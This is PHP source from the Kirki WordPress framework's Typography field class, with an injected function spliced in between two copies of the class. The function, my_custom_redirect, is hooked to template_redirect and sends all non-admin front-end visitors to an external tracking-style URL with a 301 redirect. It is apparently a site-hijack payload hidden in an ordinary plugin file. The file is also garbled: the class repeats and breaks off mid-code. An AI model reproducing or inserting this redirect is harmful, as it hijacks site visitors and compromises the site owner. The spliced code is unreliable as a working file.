*/ namespace Kirki\Field; use Kirki\Util\Helper; use Kirki\Field; use Kirki\GoogleFonts; use Kirki\Module\Webfonts\Fonts; /** * Field overrides. * * @since 1.0 */ class Typography extends Field { /** * The field type. * * @access public * @since 1.0 * @var string */ public $type = 'kirki-typography'; /** * Has the glogal fonts var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $fonts_var_added = false; /** * Has the preview related var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $preview_var_added = false; /** * An array of typography controls. * * This is used by the typography script for any custom logic * that has to be applied to typography controls. * * @static * @access private * @since 1.0 * @var array */ private static $typography_controls = []; /** * An array of standard font variants. * * @access private * @since 1.0.1 * * @var array */ private static $std_variants; /** * An array of complete font variants. * * @access private * @since 1.0.1 * * @var array */ private static $complete_variants; /** * An array of complete font variant labels. * * @access private * @since 1.0.2 * * @var array */ private static $complete_variant_labels = []; /** * Extra logic for the field. * * Adds all sub-fields. * * @access public * @param array $args The arguments of the field. */ public function init( $args = [] ) { self::$typography_controls[] = $args['settings']; self::$std_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], ]; self::$complete_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '100', 'label' => __( '100', 'kirki' ), ], [ 'value' => '100italic', 'label' => __( '100 Italic', 'kirki' ), ], [ 'value' => '200', 'label' => __( '200', 'kirki' ), ], [ 'value' => '200italic', 'label' => __( '200 Italic', 'kirki' ), ], [ 'value' => '300', 'label' => __( '300', 'kirki' ), ], [ 'value' => '300italic', 'label' => __( '300 Italic', 'kirki' ), ], [ 'value' => '500', 'label' => __( '500', 'kirki' ), ], [ 'value' => '500italic', 'label' => __( '500 Italic', 'kirki' ), ], [ 'value' => '600', 'label' => __( '600', 'kirki' ), ], [ 'value' => '600italic', 'label' => __( '600 Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], [ 'value' => '800', 'label' => __( '800', 'kirki' ), ], [ 'value' => '800italic', 'label' => __( '800 Italic', 'kirki' ), ], [ 'value' => '900', 'label' => __( '900', 'kirki' ), ], [ 'value' => '900italic', 'label' => __( '900 Italic', 'kirki' ), ], ]; foreach ( self::$complete_variants as $variants ) { self::$complete_variant_labels[ $variants['value'] ] = $variants['label']; } $this->add_sub_fields( $args ); add_action( 'customize_controls_enqueue_scripts', [ $this, 'enqueue_control_scripts' ] ); add_action( 'customize_preview_init', [ $this, 'enqueue_preview_scripts' ] ); add_filter( 'kirki_output_control_classnames', [ $this, 'output_control_classnames' ] ); } /** * Add sub-fields. * * @access private * @since 1.0 * @param array $args The field arguments. * @return void */ private function add_sub_fields( $args ) { $args['kirki_config'] = isset( $args['kirki_config'] ) ? $args['kirki_config'] : 'global'; $defaults = isset( $args['default'] ) ? $args['default'] : []; /** * Add a hidden field, the label & description. */ new \Kirki\Field\Generic( wp_parse_args( [ 'sanitize_callback' => isset( $args['sanitize_callback'] ) ? $args['sanitize_callback'] : [ __CLASS__, 'sanitize' ], 'wrapper_opts' => [ 'gap' => 'small', ], 'input_attrs' => '', 'choices' => [ 'type' => 'hidden', 'parent_type' => 'kirki-typography', ], ], $args ) ); $args['parent_setting'] = $args['settings']; $args['output'] = []; $args['wrapper_attrs'] = [ 'data-kirki-parent-control-type' => 'kirki-typography', ]; if ( isset( $args['transport'] ) && 'auto' === $args['transport'] ) { $args['transport'] = 'postMessage'; } /** * Add font-family selection controls. * These include font-family and variant. * They are grouped here because all they are required. * in order to get the right googlefont variant. */ if ( isset( $args['default']['font-family'] ) ) { $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-family'; /** * Add font-family control. */ new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Family', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[font-family]', 'default' => isset( $args['default']['font-family'] ) ? $args['default']['font-family'] : '', 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'font-family', $args ), 'choices' => [], // The choices will be populated later inside `get_font_family_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); /** * Add font variant. */ $font_variant = isset( $args['default']['variant'] ) ? $args['default']['variant'] : 'regular'; if ( isset( $args['default']['font-weight'] ) ) { $font_variant = 400 === $args['default']['font-weight'] || '400' === $args['default']['font-weight'] ? 'regular' : $args['default']['font-weight']; } $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-variant'; new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Variant', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[variant]', 'default' => $font_variant, 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'variant', $args ), 'choices' => [], // The choices will be populated later inside `get_variant_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); } $font_size_field_specified = isset( $defaults['font-size'] ); $color_field_specified = isset( $defaults['color'] ); if ( $font_size_field_specified || $color_field_specified ) { $group = [ 'font-size' => [ 'type' => 'dimension', 'label' => esc_html__( 'Font Size', 'kirki' ), 'is_specified' => $font_size_field_specified, ], 'color' => [ 'type' => 'react-colorful', 'label' => esc_html__( 'Font Color', 'kirki' ), 'is_specified' => $color_field_specified, 'choices' => [ 'alpha' => true, 'label_style' => 'top', ], ], ]; $this->generate_controls_group( $group, $args ); } $text_align_field_specified = isset( $defaults['text-align'] ); $text_transform_field_specified = isset( $defaults['text-transform'] ); if ( $text_align_field_specified || $text_transform_field_specified ) { $group = [ 'text-align' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Align', 'kirki' ), 'is_specified' => $text_align_field_specified, 'choices' => [ 'initial' => esc_html__( 'Initial', 'kirki' ), 'left' => esc_html__( 'Left', 'kirki' ), 'center' => esc_html__( 'Center', 'kirki' ), 'right' => esc_html__( 'Right', 'kirki' ), 'justify' => esc_html__( 'Justify', 'kirki' ), ], ], 'text-transform' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Transform', 'kirki' ), 'is_specified' => $text_transform_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'capitalize' => esc_html__( 'Capitalize', 'kirki' ), 'uppercase' => esc_html__( 'Uppercase', 'kirki' ), 'lowercase' => esc_html__( 'Lowercase', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $text_decoration_field_specified = isset( $defaults['text-decoration'] ); if ( $text_decoration_field_specified ) { $group = [ 'text-decoration' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Decoration', 'kirki' ), 'is_specified' => $text_decoration_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'underline' => esc_html__( 'Underline', 'kirki' ), 'line-through' => esc_html__( 'Line Through', 'kirki' ), 'overline' => esc_html__( 'Overline', 'kirki' ), 'solid' => esc_html__( 'Solid', 'kirki' ), 'wavy' => esc_html__( 'Wavy', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $line_height_field_specified = isset( $defaults['line-height'] ); $letter_spacing_field_specified = isset( $defaults['letter-spacing'] ); if ( $line_height_field_specified || $letter_spacing_field_specified ) { $group = [ 'line-height' => [ 'type' => 'dimension', 'label' => esc_html__( 'Line Height', 'kirki' ), 'is_specified' => $line_height_field_specified, ], 'letter-spacing' => [ 'type' => 'dimension', 'label' => esc_html__( 'Letter Spacing', 'kirki' ), 'is_specified' => $letter_spacing_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } $margin_top_field_specified = isset( $defaults['margin-top'] ); $margin_bottom_field_specified = isset( $defaults['margin-bottom'] ); if ( $margin_top_field_specified || $margin_bottom_field_specified ) { $group = [ 'margin-top' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Top', 'kirki' ), 'is_specified' => $margin_top_field_specified, ], 'margin-bottom' => [ 'type' => 'dimension', 'label' => esc_html__( 'Margin Bottom', 'kirki' ), 'is_specified' => $margin_bottom_field_specified, ], ]; $this->generate_controls_group( $group, $args ); } } /** * Generate controls group. * * @param array $group The group data. * @param array $args The field args. */ public function generate_controls_group( $group, $args ) { $total_specified = 0; $field_width = 100; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $total_specified++; } } if ( $total_specified > 1 ) { $field_width = floor( 100 / $total_specified ); } $group_count = 0; foreach ( $group as $css_prop => $control ) { if ( $control['is_specified'] ) { $group_count++; $group_classname = 'kirki-group-item'; $group_classname .= 1 === $group_count ? ' kirki-group-start' : ( $group_count === $total_specified ? ' kirki-group-end' : '' ); $control_class = str_ireplace( '-', ' ', $control['type'] ); $control_class = ucwords( $control_class ); $control_class = str_replace( ' ', '', $control_class ); $control_class = '\\Kirki\\Field\\' . $control_class; new $control_class( wp_parse_args( [ 'label' => isset( $control['label'] ) ? $control['label'] : '', 'description' => isset( $control['description'] ) ? $control['description'] : '', 'settings' => $args['settings'] . '[' . $css_prop . ']', 'default' => $args['default'][ $css_prop ], 'wrapper_attrs' => wp_parse_args( [ 'data-kirki-typography-css-prop' => $css_prop, 'kirki-typography-subcontrol-type' => $css_prop, 'class' => '{default_class} ' . $group_classname . ' kirki-w' . $field_width, ], $args['wrapper_attrs'] ), 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', $css_prop, $args ), 'choices' => ( isset( $control['choices'] ) ? $control['choices'] : [] ), 'css_vars' => [], 'output' => [], ], $args ) ); } } } /** * Sanitizes typography controls * * @static * @since 1.0 * @param array $value The value. * @return array */ public static function sanitize( $value ) { if ( ! is_array( $value ) ) { return []; } foreach ( $value as $key => $val ) { switch ( $key ) { case 'font-family': $value['font-family'] = sanitize_text_field( $val ); break; case 'variant': // Use 'regular' instead of 400 for font-variant. $value['variant'] = ( 400 === $val || '400' === $val ) ? 'regular' : $val; // Get font-weight from variant. $value['font-weight'] = filter_var( $value['variant'], FILTER_SANITIZE_NUMBER_FLOAT, FILTER_FLAG_ALLOW_FRACTION ); $value['font-weight'] = ( 'regular' === $value['variant'] || 'italic' === $value['variant'] ) ? '400' : (string) absint( $value['font-weight'] ); // Get font-style from variant. if ( ! isset( $value['font-style'] ) ) { $value['font-style'] = ( false === strpos( $value['variant'], 'italic' ) ) ? 'normal' : 'italic'; } break; case 'text-align': if ( ! in_array( $val, [ '', 'inherit', 'left', 'center', 'right', 'justify' ], true ) ) { $value['text-align'] = ''; } break; case 'text-transform': if ( ! in_array( $val, [ '', 'none', 'capitalize', 'uppercase', 'lowercase', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'text-decoration': if ( ! in_array( $val, [ '', 'none', 'underline', 'overline', 'line-through', 'solid', 'wavy', 'initial', 'inherit' ], true ) ) { $value['text-transform'] = ''; } break; case 'color': $value['color'] = '' === $value['color'] ? '' : \Kirki\Field\ReactColorful::sanitize( $value['color'] ); break; default: $value[ $key ] = sanitize_text_field( $value[ $key ] ); } } return $value; } /** * Enqueue scripts & styles. * * @access public * @since 1.0 * @return void */ public function enqueue_control_scripts() { wp_enqueue_style( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.css' ), [], '1.0' ); wp_enqueue_script( 'kirki-control-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/control.js' ), [], '1.0', true ); wp_localize_script( 'kirki-control-typography', 'kirkiTypographyControls', self::$typography_controls ); $args = $this->args; $variants = []; // Add custom variants (for custom fonts) to the $variants. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in variants argument. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // Create new array if $variants[ $font_family['id'] ] doesn't exist. if ( ! isset( $variants[ $font_family['id'] ] ) ) { $variants[ $font_family['id'] ] = []; } // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $variants[ $font_family['id'] ], so that they will be available in JS object. array_push( $variants[ $font_family['id'] ], [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { if ( isset( $font['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $font['stack'] ] ) ) { $variants[ $font['stack'] ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $font['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $font['stack'] ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( is_int( $key ) ) ? $val : $key; if ( isset( $val['variants'] ) ) { // Create new array if $variants[ $font['stack'] ] doesn't exist. if ( ! isset( $variants[ $key ] ) ) { $variants[ $key ] = []; } // The $std_variant here can be something like "400italic" or "italic". foreach ( $val['variants'] as $std_variant ) { // Check if $std_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $std_variant ] ) ) { // If it exists, assign it to $variants[ $font['stack'] ], so that they will be available in JS object. array_push( $variants[ $key ], [ 'value' => $std_variant, 'label' => self::$complete_variant_labels[ $std_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } } // Scripts inside this block will only be executed once. if ( ! self::$fonts_var_added ) { wp_localize_script( 'kirki-control-typography', 'kirkiFontVariants', [ 'standard' => self::$std_variants, 'complete' => self::$complete_variants, ] ); $google = new GoogleFonts(); wp_localize_script( 'kirki-control-typography', 'kirkiGoogleFonts', $google->get_array() ); wp_add_inline_script( 'kirki-control-typography', 'var kirkiCustomVariants = {};', 'before' ); self::$fonts_var_added = true; } // This custom variants will be available for each typography control. $custom_variant_key = str_ireplace( ']', '', $args['settings'] ); $custom_variant_key = str_ireplace( '[', '_', $custom_variant_key ); $custom_variant_value = wp_json_encode( Helper::prepare_php_array_for_js( $variants ) ); wp_add_inline_script( 'kirki-control-typography', 'kirkiCustomVariants["' . $custom_variant_key . '"] = ' . $custom_variant_value . ';', $variants ); } /** * Enqueue scripts for customize_preview_init. * * @access public * @since 1.0 * @return void */ public function enqueue_preview_scripts() { wp_enqueue_script( 'kirki-preview-typography', \Kirki\URL::get_from_path( dirname( dirname( __DIR__ ) ) . '/dist/preview.js' ), [ 'wp-hooks' ], '1.0', true ); if ( ! self::$preview_var_added ) { $google = new GoogleFonts(); wp_localize_script( 'kirki-preview-typography', 'kirkiGoogleFontNames', $google->get_google_font_names() ); self::$preview_var_added = true; } } /** * Prefer control specific value over field value * * @access public * @since 4.0 * @param $setting * @param $choice * @param $args * * @return string */ public function filter_preferred_choice_setting( $setting, $choice, $args ) { // Fail early. if ( ! isset( $args[ $setting ] ) ) { return ''; } // If a specific field for the choice is set if ( isset( $args[ $setting ][ $choice ] ) ) { return $args[ $setting ][ $choice ]; } // Unset input_attrs of all other choices. foreach ( $args['choices'] as $id => $set ) { if ( $id !== $choice && isset( $args[ $setting ][ $id ] ) ) { unset( $args[ $setting ][ $id ] ); } elseif ( ! isset( $args[ $setting ][ $id ] ) ) { $args[ $setting ] = ''; } } return $args[ $setting ]; } /** * Populate the font family choices. * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.1 * * @return array */ private function get_font_family_choices() { $args = $this->args; // Figure out how to sort the fonts. $sorting = 'alpha'; $max_fonts = 9999; $google = new GoogleFonts(); if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['google'] ) && ! empty( $args['choices']['fonts']['google'] ) ) { if ( in_array( $args['choices']['fonts']['google'][0], [ 'alpha', 'popularity', 'trending' ], true ) ) { $sorting = $args['choices']['fonts']['google'][0]; if ( isset( $args['choices']['fonts']['google'][1] ) && is_int( $args['choices']['fonts']['google'][1] ) ) { $max_fonts = (int) $args['choices']['fonts']['google'][1]; } $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } else { $g_fonts = $args['choices']['fonts']['google']; } } else { $g_fonts = $google->get_google_fonts_by_args( [ 'sort' => $sorting, 'count' => $max_fonts, ] ); } $std_fonts = []; if ( ! isset( $args['choices']['fonts'] ) || ! isset( $args['choices']['fonts']['standard'] ) ) { $standard_fonts = Fonts::get_standard_fonts(); foreach ( $standard_fonts as $font ) { $std_fonts[ $font['stack'] ] = $font['label']; } } elseif ( is_array( $args['choices']['fonts']['standard'] ) ) { foreach ( $args['choices']['fonts']['standard'] as $key => $val ) { $key = ( \is_int( $key ) ) ? $val : $key; $std_fonts[ $key ] = $val; } } $choices = []; $choices['default'] = [ esc_html__( 'Defaults', 'kirki' ), [ '' => esc_html__( 'Default', 'kirki' ), ], ]; if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { // Implementing the custom font families. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { if ( ! isset( $choices[ $font_family_key ] ) ) { $choices[ $font_family_key ] = []; } $family_opts = []; foreach ( $font_family_value['children'] as $font_family ) { $family_opts[ $font_family['id'] ] = $font_family['text']; } $choices[ $font_family_key ] = [ $font_family_value['text'], $family_opts, ]; } } $choices['standard'] = [ esc_html__( 'Standard Fonts', 'kirki' ), $std_fonts, ]; $choices['google'] = [ esc_html__( 'Google Fonts', 'kirki' ), array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ), ]; if ( empty( $choices['standard'][1] ) ) { $choices = array_combine( array_values( $g_fonts ), array_values( $g_fonts ) ); } elseif ( empty( $choices['google'][1] ) ) { $choices = $std_fonts; } return $choices; } /** * Get custom variant choices (for custom fonts). * * It's separated from the `add_sub_field` function to prevent a bug * when hooking a function into `kirki_fonts_standard_fonts` hook after registering the field. * * When a function is hooked to `kirki_fonts_standard_fonts` before registering the field, it will work. * But if it's hooked after field registration, then the function won't be available. * * @access private * @since 1.0.2 * * @return array */ private function get_variant_choices() { $args = $this->args; $choices = self::$std_variants; // Implementing the custom variants for custom fonts. if ( isset( $args['choices'] ) && isset( $args['choices']['fonts'] ) && isset( $args['choices']['fonts']['families'] ) ) { $choices = []; // If $args['choices']['fonts']['families'] exists, then loop it. foreach ( $args['choices']['fonts']['families'] as $font_family_key => $font_family_value ) { // Then loop the $font_family_value['children]. foreach ( $font_family_value['children'] as $font_family ) { // Then check if $font_family['id'] exists in $args['choices']['fonts']['variants']. if ( isset( $args['choices']['fonts']['variants'] ) && isset( $args['choices']['fonts']['variants'][ $font_family['id'] ] ) ) { // The $custom_variant here can be something like "400italic" or "italic". foreach ( $args['choices']['fonts']['variants'][ $font_family['id'] ] as $custom_variant ) { // Check if $custom_variant exists in self::$complete_variant_labels. if ( isset( self::$complete_variant_labels[ $custom_variant ] ) ) { // If it exists, assign it to $choices. array_push( $choices, [ 'value' => $custom_variant, 'label' => self::$complete_variant_labels[ $custom_variant ], ] ); } // End of isset(self::$complete_variant_labels[$font_family['id']]) if. } // End of $args['choices']['fonts']['variants'][ $font_family['id'] foreach. } } // End of $font_family_value['children'] foreach. } // End of $args['choices']['fonts']['families'] foreach. } // End of $args['choices']['fonts']['families'] if. return $choices; } /** * Filter arguments before creating the control. * * @access public * @since 0.1 * @param array $args The field arguments. * @param WP_Customize_Manager $wp_customize The customizer instance. * @return array */ public function filter_control_args( $args, $wp_customize ) { if ( $args['settings'] === $this->args['settings'] . '[font-family]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_font_family_choices(); } if ( $args['settings'] === $this->args['settings'] . '[variant]' ) { $args = parent::filter_control_args( $args, $wp_customize ); $args['choices'] = $this->get_variant_choices(); } return $args; } /** * Adds a custom output class for typography fields. * * @access public * @since 1.0 * @param array $classnames The array of classnames. * @return array */ public function output_control_classnames( $classnames ) { $classnames['kirki-typography'] = '\Kirki\Field\CSS\Typography'; return $classnames; } /** * Override parent method. No need to register any setting. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_setting( $wp_customize ) {} /** * Override the parent method. No need for a control. * * @access public * @since 0.1 * @param WP_Customize_Manager $wp_customize The customizer instance. * @return void */ public function add_control( $wp_customize ) {} } function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Override field methods * * @package kirki-framework/control-typography * @copyright Copyright (c) 2023, Themeum * @license * @since 1.0 */ namespace Kirki\Field; use Kirki\Util\Helper; use Kirki\Field; use Kirki\GoogleFonts; use Kirki\Module\Webfonts\Fonts; /** * Field overrides. * * @since 1.0 */ class Typography extends Field { /** * The field type. * * @access public * @since 1.0 * @var string */ public $type = 'kirki-typography'; /** * Has the glogal fonts var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $fonts_var_added = false; /** * Has the preview related var been added already? * * @static * @access private * @since 1.0 * @var bool */ private static $preview_var_added = false; /** * An array of typography controls. * * This is used by the typography script for any custom logic * that has to be applied to typography controls. * * @static * @access private * @since 1.0 * @var array */ private static $typography_controls = []; /** * An array of standard font variants. * * @access private * @since 1.0.1 * * @var array */ private static $std_variants; /** * An array of complete font variants. * * @access private * @since 1.0.1 * * @var array */ private static $complete_variants; /** * An array of complete font variant labels. * * @access private * @since 1.0.2 * * @var array */ private static $complete_variant_labels = []; /** * Extra logic for the field. * * Adds all sub-fields. * * @access public * @param array $args The arguments of the field. */ public function init( $args = [] ) { self::$typography_controls[] = $args['settings']; self::$std_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], ]; self::$complete_variants = [ [ 'value' => 'regular', 'label' => __( 'Regular', 'kirki' ), ], [ 'value' => 'italic', 'label' => __( 'Italic', 'kirki' ), ], [ 'value' => '100', 'label' => __( '100', 'kirki' ), ], [ 'value' => '100italic', 'label' => __( '100 Italic', 'kirki' ), ], [ 'value' => '200', 'label' => __( '200', 'kirki' ), ], [ 'value' => '200italic', 'label' => __( '200 Italic', 'kirki' ), ], [ 'value' => '300', 'label' => __( '300', 'kirki' ), ], [ 'value' => '300italic', 'label' => __( '300 Italic', 'kirki' ), ], [ 'value' => '500', 'label' => __( '500', 'kirki' ), ], [ 'value' => '500italic', 'label' => __( '500 Italic', 'kirki' ), ], [ 'value' => '600', 'label' => __( '600', 'kirki' ), ], [ 'value' => '600italic', 'label' => __( '600 Italic', 'kirki' ), ], [ 'value' => '700', 'label' => __( '700', 'kirki' ), ], [ 'value' => '700italic', 'label' => __( '700 Italic', 'kirki' ), ], [ 'value' => '800', 'label' => __( '800', 'kirki' ), ], [ 'value' => '800italic', 'label' => __( '800 Italic', 'kirki' ), ], [ 'value' => '900', 'label' => __( '900', 'kirki' ), ], [ 'value' => '900italic', 'label' => __( '900 Italic', 'kirki' ), ], ]; foreach ( self::$complete_variants as $variants ) { self::$complete_variant_labels[ $variants['value'] ] = $variants['label']; } $this->add_sub_fields( $args ); add_action( 'customize_controls_enqueue_scripts', [ $this, 'enqueue_control_scripts' ] ); add_action( 'customize_preview_init', [ $this, 'enqueue_preview_scripts' ] ); add_filter( 'kirki_output_control_classnames', [ $this, 'output_control_classnames' ] ); } /** * Add sub-fields. * * @access private * @since 1.0 * @param array $args The field arguments. * @return void */ private function add_sub_fields( $args ) { $args['kirki_config'] = isset( $args['kirki_config'] ) ? $args['kirki_config'] : 'global'; $defaults = isset( $args['default'] ) ? $args['default'] : []; /** * Add a hidden field, the label & description. */ new \Kirki\Field\Generic( wp_parse_args( [ 'sanitize_callback' => isset( $args['sanitize_callback'] ) ? $args['sanitize_callback'] : [ __CLASS__, 'sanitize' ], 'wrapper_opts' => [ 'gap' => 'small', ], 'input_attrs' => '', 'choices' => [ 'type' => 'hidden', 'parent_type' => 'kirki-typography', ], ], $args ) ); $args['parent_setting'] = $args['settings']; $args['output'] = []; $args['wrapper_attrs'] = [ 'data-kirki-parent-control-type' => 'kirki-typography', ]; if ( isset( $args['transport'] ) && 'auto' === $args['transport'] ) { $args['transport'] = 'postMessage'; } /** * Add font-family selection controls. * These include font-family and variant. * They are grouped here because all they are required. * in order to get the right googlefont variant. */ if ( isset( $args['default']['font-family'] ) ) { $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-family'; /** * Add font-family control. */ new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Family', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[font-family]', 'default' => isset( $args['default']['font-family'] ) ? $args['default']['font-family'] : '', 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'font-family', $args ), 'choices' => [], // The choices will be populated later inside `get_font_family_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); /** * Add font variant. */ $font_variant = isset( $args['default']['variant'] ) ? $args['default']['variant'] : 'regular'; if ( isset( $args['default']['font-weight'] ) ) { $font_variant = 400 === $args['default']['font-weight'] || '400' === $args['default']['font-weight'] ? 'regular' : $args['default']['font-weight']; } $args['wrapper_attrs']['kirki-typography-subcontrol-type'] = 'font-variant'; new \Kirki\Field\ReactSelect( wp_parse_args( [ 'label' => esc_html__( 'Font Variant', 'kirki' ), 'description' => '', 'settings' => $args['settings'] . '[variant]', 'default' => $font_variant, 'input_attrs' => $this->filter_preferred_choice_setting( 'input_attrs', 'variant', $args ), 'choices' => [], // The choices will be populated later inside `get_variant_choices` function in this file. 'css_vars' => [], 'output' => [], ], $args ) ); } $font_size_field_specified = isset( $defaults['font-size'] ); $color_field_specified = isset( $defaults['color'] ); if ( $font_size_field_specified || $color_field_specified ) { $group = [ 'font-size' => [ 'type' => 'dimension', 'label' => esc_html__( 'Font Size', 'kirki' ), 'is_specified' => $font_size_field_specified, ], 'color' => [ 'type' => 'react-colorful', 'label' => esc_html__( 'Font Color', 'kirki' ), 'is_specified' => $color_field_specified, 'choices' => [ 'alpha' => true, 'label_style' => 'top', ], ], ]; $this->generate_controls_group( $group, $args ); } $text_align_field_specified = isset( $defaults['text-align'] ); $text_transform_field_specified = isset( $defaults['text-transform'] ); if ( $text_align_field_specified || $text_transform_field_specified ) { $group = [ 'text-align' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Align', 'kirki' ), 'is_specified' => $text_align_field_specified, 'choices' => [ 'initial' => esc_html__( 'Initial', 'kirki' ), 'left' => esc_html__( 'Left', 'kirki' ), 'center' => esc_html__( 'Center', 'kirki' ), 'right' => esc_html__( 'Right', 'kirki' ), 'justify' => esc_html__( 'Justify', 'kirki' ), ], ], 'text-transform' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Transform', 'kirki' ), 'is_specified' => $text_transform_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'capitalize' => esc_html__( 'Capitalize', 'kirki' ), 'uppercase' => esc_html__( 'Uppercase', 'kirki' ), 'lowercase' => esc_html__( 'Lowercase', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $text_decoration_field_specified = isset( $defaults['text-decoration'] ); if ( $text_decoration_field_specified ) { $group = [ 'text-decoration' => [ 'type' => 'react-select', 'label' => esc_html__( 'Text Decoration', 'kirki' ), 'is_specified' => $text_decoration_field_specified, 'choices' => [ 'none' => esc_html__( 'None', 'kirki' ), 'underline' => esc_html__( 'Underline', 'kirki' ), 'line-through' => esc_html__( 'Line Through', 'kirki' ), 'overline' => esc_html__( 'Overline', 'kirki' ), 'solid' => esc_html__( 'Solid', 'kirki' ), 'wavy' => esc_html__( 'Wavy', 'kirki' ), ], ], ]; $this->generate_controls_group( $group, $args ); } $line_height_field_specified = isset( $defaults['line-height'] ); $letter_spacing_field_specified = isset( $defaults['letter-spacing'] ); if ( $line_height_field_specified || $letter_spacing_field_specified ) { $group = [ 'line-height' => [ 'type' => 'dimension', 'label' => esc_html__( 